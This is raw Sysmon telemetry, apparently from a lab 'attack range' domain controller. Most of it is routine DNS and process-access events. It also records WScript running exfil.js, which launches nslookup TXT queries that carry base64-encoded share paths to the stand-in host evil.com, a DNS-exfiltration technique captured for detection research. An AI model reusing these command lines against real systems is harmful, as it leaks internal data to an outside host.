process>-udptruefalse127.0.0.1-52752-false127.0.0.1-53domain 354300x8000000000000000200814Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{00000000-0000-0000-0000-000000000000}2328<unknown process>-udpfalsefalse127.0.0.1-52751-false127.0.0.1-53domain 354300x8000000000000000200813Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.261{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52751- 354300x8000000000000000200812Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52750-false127.0.0.1-53domain 354300x8000000000000000200811Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52750- 354300x8000000000000000200810Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52750-false127.0.0.1-53domain 354300x8000000000000000200809Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52749-false127.0.0.1-53domain 354300x8000000000000000200808Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52749- 354300x8000000000000000200807Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.189{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52749-false127.0.0.1-53domain 354300x8000000000000000200806Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.188{00000000-0000-0000-0000-000000000000}3976<unknown process>-udpfalsefalse127.0.0.1-52748-false127.0.0.1-53domain 354300x8000000000000000200805Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.188{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52748- 354300x8000000000000000200804Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.188{00000000-0000-0000-0000-000000000000}3976<unknown process>-udptruefalse127.0.0.1-52748-false127.0.0.1-53domain 354300x8000000000000000200803Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.083{00000000-0000-0000-0000-000000000000}1908<unknown process>-udpfalsefalse127.0.0.1-52747-false127.0.0.1-53domain 354300x8000000000000000200802Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.083{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52747- 354300x8000000000000000200801Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.082{00000000-0000-0000-0000-000000000000}1908<unknown process>-udptruefalse127.0.0.1-52747-false127.0.0.1-53domain 354300x8000000000000000200800Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.082{00000000-0000-0000-0000-000000000000}1908<unknown process>-udpfalsefalse127.0.0.1-52746-false127.0.0.1-53domain 354300x8000000000000000200799Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.082{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52746- 354300x8000000000000000200798Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.082{00000000-0000-0000-0000-000000000000}1908<unknown process>-udptruefalse127.0.0.1-52746-false127.0.0.1-53domain 354300x8000000000000000200797Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.081{00000000-0000-0000-0000-000000000000}1908<unknown process>-udpfalsefalse127.0.0.1-52745-false127.0.0.1-53domain 354300x8000000000000000200796Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.081{2E1864BB-E14E-6299-2C00-000000005F02}2224C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-52745- 354300x8000000000000000200795Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.081{00000000-0000-0000-0000-000000000000}1908<unknown process>-udptruefalse127.0.0.1-52745-false127.0.0.1-53domain 10341000x8000000000000000200794Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.711{2E1864BB-17C0-629A-9940-000000005F02}12402652C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9840-000000005F02}5700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000200793Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.490{00000000-0000-0000-0000-000000000000}7432<unknown process>-udptruefalse127.0.0.1-52726-false127.0.0.1-53domain 10341000x8000000000000000200792Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.695{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9940-000000005F02}1240C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200791Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9840-000000005F02}5700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200790Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200789Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200788Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200787Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200786Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-17A1-629A-783D-000000005F02}55527912C:\Windows\System32\WScript.exe{2E1864BB-17C0-629A-9840-000000005F02}5700C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200785Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.690{2E1864BB-17C0-629A-9840-000000005F02}5700C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBMb2dvbiBzZXJ2ZXIgc2hhcmUg evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzroa.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200784Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.679{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nldhils.tmpMD5=FFC3044AFB570E80F372BF53DBBB8207,SHA256=F6E14FFAF6210075EB5936267DAFDA62885E6C7751665C0CB6BEB4993231BC98,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200783Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-17C0-629A-9640-000000005F02}38324624C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9740-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200782Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200781Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200780Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200779Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200778Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9740-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200777Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.632{2E1864BB-17C0-629A-9540-000000005F02}72121716C:\Windows\system32\cmd.exe{2E1864BB-17C0-629A-9740-000000005F02}7144C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200776Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.637{2E1864BB-17C0-629A-9740-000000005F02}7144C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17C0-629A-9540-000000005F02}7212C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVQYXRoOiBDOlxXaW5kb3dzXFNZU1ZPTFxzeXN2b2w= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldhils.tmp 2>&1 10341000x8000000000000000200775Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.596{2E1864BB-E13E-6299-1000-000000005F02}3642072C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9640-000000005F02}3832C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200774Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.596{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17C0-629A-9640-000000005F02}3832C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200773Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.596{2E1864BB-17C0-629A-9640-000000005F02}38324624C:\Windows\system32\conhost.exe{2E1864BB-17C0-629A-9540-000000005F02}7212C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200772Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-17C0-629A-9640-000000005F02}3832C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200771Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200770Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200769Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:32.580{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200768Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 